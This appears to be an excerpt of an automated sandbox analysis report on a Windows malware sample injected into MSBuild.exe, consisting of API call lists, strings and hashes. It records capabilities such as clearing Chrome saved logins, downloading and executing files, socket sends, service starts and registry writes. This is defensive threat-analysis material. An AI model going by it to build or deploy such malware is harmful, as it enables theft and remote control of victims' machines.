                                                                                                                                                                                    • Instruction ID: 861c71bda04042c44626cba1538e35c757a91b728f0af2478fb4c1063bb13cc5
                                                                                                                                                                                    • Opcode Fuzzy Hash: d888b96030b54da055a208261f198eee06433eb1d16a51921b03b151a89bb74f
                                                                                                                                                                                    • Instruction Fuzzy Hash: B08141315042405BC314FB62C892EEFB3A5AFD1718F50493FF946671E2EF389A49C69A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                                                                                                                                                                                      • Part of subcall function 00404468: send.WS2_32(000002E0,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                    • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                                                                                                    • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                                                                                                    • API String ID: 2127411465-314212984
                                                                                                                                                                                    • Opcode ID: 09577f2048b6351fe6f271c07526fcd758d55e1eb1894ae70fce06cab07ac104
                                                                                                                                                                                    • Instruction ID: cc67afc49b78d61a2372e1362dfc4f5d4a672f2d1b5b468e2109e7b1f18a6fb5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 09577f2048b6351fe6f271c07526fcd758d55e1eb1894ae70fce06cab07ac104
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4FB1B671A043006BC614BA76CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0040B261
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • UserProfile, xrefs: 0040B227
                                                                                                                                                                                    • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                                                                                                                                                    • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                                                                                                                                                    • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DeleteErrorFileLast
                                                                                                                                                                                    • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                                                                                                    • API String ID: 2018770650-1062637481
                                                                                                                                                                                    • Opcode ID: 6271698307c79f353f6ee14750273fab332a6b3e3f46d995ad72bb9cc5e0b911
                                                                                                                                                                                    • Instruction ID: 236ee74dc97b4bdf00ef4875347123a6b81b21ae8e03a402b83ae8c28ff1bd46
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6271698307c79f353f6ee14750273fab332a6b3e3f46d995ad72bb9cc5e0b911
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3001A23168410597CA0477B5ED6F8AE3624E921704F50017FF802731E2FF3A9A0586DE
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                                                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00416B02
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                                                                                                    • API String ID: 3534403312-3733053543
                                                                                                                                                                                    • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                                                                                                    • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                                                                                                                                                                    • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                                                                                                    • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: __floor_pentium4
                                                                                                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                    • API String ID: 4168288129-2761157908
                                                                                                                                                                                    • Opcode ID: 66bc95b00190c33de1dc88885a8d3c2e2540cf288971a00217ef3550ead5f7a6
                                                                                                                                                                                    • Instruction ID: 57cc16b57fb9b80973019f24a4c29afa226e887048a240d5689d112d8919aadd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 66bc95b00190c33de1dc88885a8d3c2e2540cf288971a00217ef3550ead5f7a6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 08C26F72D046288FDB25CE28DD407EAB7B5EB44346F1441EBD84DE7242E778AE898F44
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 004089AE
                                                                                                                                                                                      • Part of subcall function 004041F1: socket.WS2_32(00000002,00000001,00000006), ref: 00404212
                                                                                                                                                                                      • Part of subcall function 0040428C: connect.WS2_32(?,00FFB490,00000010), ref: 004042A5
                                                                                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                                                                                                                                                    • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                                                                                                                                                      • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(000002F4,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                                                                                                      • Part of subcall function 00404468: SetEvent.KERNEL32(000002F4,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                                                                                                      • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                                                                                                                      • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                                                                                                                      • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                                                                                                                                                      • Part of subcall function 00404468: send.WS2_32(000002E0,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4043647387-0
                                                                                                                                                                                    • Opcode ID: c404a200351ef79009e5c2b568477031f9b04cd7ed7dc3b93d2592a172ccef36
                                                                                                                                                                                    • Instruction ID: d7705bc86650fd6632c5f082d335fbcd32bd3fe840799e2454ee74f5ab9ae988
                                                                                                                                                                                    • Opcode Fuzzy Hash: c404a200351ef79009e5c2b568477031f9b04cd7ed7dc3b93d2592a172ccef36
                                                                                                                                                                                    • Instruction Fuzzy Hash: 11A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF546B71D2EF385E498B98
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041981A,00000000,00000000), ref: 00419BCD
                                                                                                                                                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041981A,00000000,00000000), ref: 00419BE2
                                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419BEF
                                                                                                                                                                                    • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041981A,00000000,00000000), ref: 00419BFA
                                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0C
                                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 276877138-0
                                                                                                                                                                                    • Opcode ID: b329c8b03f607fc556bfe747d7dfe709dacdcffe937466b951116c7124fc47ce
                                                                                                                                                                                    • Instruction ID: 9ab78235182221d9a13884b701025ebbd4d22640777282bd149d85cf0e5c5631
                                                                                                                                                                                    • Opcode Fuzzy Hash: b329c8b03f607fc556bfe747d7dfe709dacdcffe937466b951116c7124fc47ce
                                                                                                                                                                                    • Instruction Fuzzy Hash: 46F0E971404314AFD2115B31FC88DBF2AACEF85BA2B00043AF54193191CF68CD4595B9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 0045127C
                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 004512A5
                                                                                                                                                                                    • GetACP.KERNEL32 ref: 004512BA
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                                    • String ID: ACP$OCP
                                                                                                                                                                                    • API String ID: 2299586839-711371036
                                                                                                                                                                                    • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                                                                                                    • Instruction ID: bcb6c1b5649eca6e102b6d6ca9fa22aa61ab34f591545d84575f60c76f210f03
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                                                                                                    • Instruction Fuzzy Hash: 50212722600100A6D7348F54D900BAB73A6AB40B66F1645E6FD09E7322F736DD49C799
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A650
                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A664
                                                                                                                                                                                    • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A66B
                                                                                                                                                                                    • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                    • String ID: SETTINGS
                                                                                                                                                                                    • API String ID: 3473537107-594951305
                                                                                                                                                                                    • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                                                                                                    • Instruction ID: 83a829ee02157d331b98a48cb758db5ec39b6d120b3a3db205f860a33549a403
                                                                                                                                                                                    • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3EE01A3A200710ABCB211BA5BC8CD477E39E7867633140036F90582331DA358850CA59
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                                                                                      • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                                      • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                                                                                      • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                                                      • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                                                                                                      • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                                                                                                                    • GetUserDefaultLCID.KERNEL32 ref: 004514C3
                                                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 0045151E
                                                                                                                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 0045152D
                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451575
                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00451594
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 745075371-0
                                                                                                                                                                                    • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                                                                                                    • Instruction ID: fdda48fcf8ef828b158f806230e01f9d82b9b72a6df542884d0e4dc3e0683d2c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A51D571900205ABEF10EFA5CC40BBF73B8AF05702F14056BFD11EB262E7789A488769
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00407A91
                                                                                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                                                                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Find$File$CloseFirstH_prologNext
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1157919129-0
                                                                                                                                                                                    • Opcode ID: 5c71d79f2f9360812dedac7527d442aa8a7fb5ca3202f1a004df0d4d64f616ad
                                                                                                                                                                                    • Instruction ID: c296e4c637b16ec180f1d25cf2666c4e6f2336455dd814d501b84ef2841b6e91
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5c71d79f2f9360812dedac7527d442aa8a7fb5ca3202f1a004df0d4d64f616ad
                                                                                                                                                                                    • Instruction Fuzzy Hash: 485173329041085ACB14FB65DD969DD7778AF50318F50417EB806B31E2EF38AB498B99
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                                                                                                                                                    • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DownloadExecuteFileShell
                                                                                                                                                                                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$open
                                                                                                                                                                                    • API String ID: 2825088817-2582742282
                                                                                                                                                                                    • Opcode ID: 1d247cdb0aff4d0870d9eedeb6704dbbe936eca242ec30238f6f4a3042bcde1d
                                                                                                                                                                                    • Instruction ID: f68f5450864a8ef507c8d3860f756bd811b48be2db930e76b40a644c5c1bb7bc
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d247cdb0aff4d0870d9eedeb6704dbbe936eca242ec30238f6f4a3042bcde1d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0761A33160434067CA14FA76C8569BE77A69F81718F00493FBC46772D6EF3C9A05C69B
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                                                                                                                                                      • Part of subcall function 00404468: send.WS2_32(000002E0,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileFind$FirstNextsend
                                                                                                                                                                                    • String ID: x@G$x@G
                                                                                                                                                                                    • API String ID: 4113138495-3390264752
                                                                                                                                                                                    • Opcode ID: b941d78aa36c79e875cd4ff3cda3d799cfcdc4edc68d4a05c7842cc5a7903677
                                                                                                                                                                                    • Instruction ID: 9df0c8526107c53e8273efc1e688d8f669138e67c86485f4ac558c26d22f9560
                                                                                                                                                                                    • Opcode Fuzzy Hash: b941d78aa36c79e875cd4ff3cda3d799cfcdc4edc68d4a05c7842cc5a7903677
                                                                                                                                                                                    • Instruction Fuzzy Hash: B42147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                                                                                                                      • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                                                                                                                      • Part of subcall function 004126D2: RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                                                                                                                      • Part of subcall function 004126D2: RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseCreateInfoParametersSystemValue
                                                                                                                                                                                    • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                                                                                                    • API String ID: 4127273184-3576401099
                                                                                                                                                                                    • Opcode ID: f4ba7aec24a953ef4b92a26ea97f229a08492362b077529f009aa708e5b31fc0
                                                                                                                                                                                    • Instruction ID: a6c166168c7895b99543370299e99232025f4d6daba66cbb636fef562e17b9dc
                                                                                                                                                                                    • Opcode Fuzzy Hash: f4ba7aec24a953ef4b92a26ea97f229a08492362b077529f009aa708e5b31fc0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 06112432B8060433D514303A4E6FBAE1806D356B60FA4415FF6026A6DAFA9E5AE103DF
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                                                                                                                      • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                                                                                                                      • Part of subcall function 004126D2: RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                                                                                                                      • Part of subcall function 004126D2: RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseCreateInfoParametersSystemValue
                                                                                                                                                                                    • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                                                                                                    • API String ID: 4127273184-3576401099
                                                                                                                                                                                    • Opcode ID: 3cca19850bf31f4f0fb7f64d74422f26e2d0d512dadd11c93372ceda303b45d5
                                                                                                                                                                                    • Instruction ID: f2617a255fd7246e173cf48333a5ec3092ca3a632a8680fa2b2f8bd5747a896b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3cca19850bf31f4f0fb7f64d74422f26e2d0d512dadd11c93372ceda303b45d5
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9EF0623278011422D529357A8E2FBEE1801D796B20F65402FF202A57D6FB8E46D142DE
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                                                                                      • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                                      • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                                                                                      • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 00450B61
                                                                                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 00450BF1
                                                                                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 00450BFF
                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00450CA2
                                                                                                                                                                                    Memory Dump Source
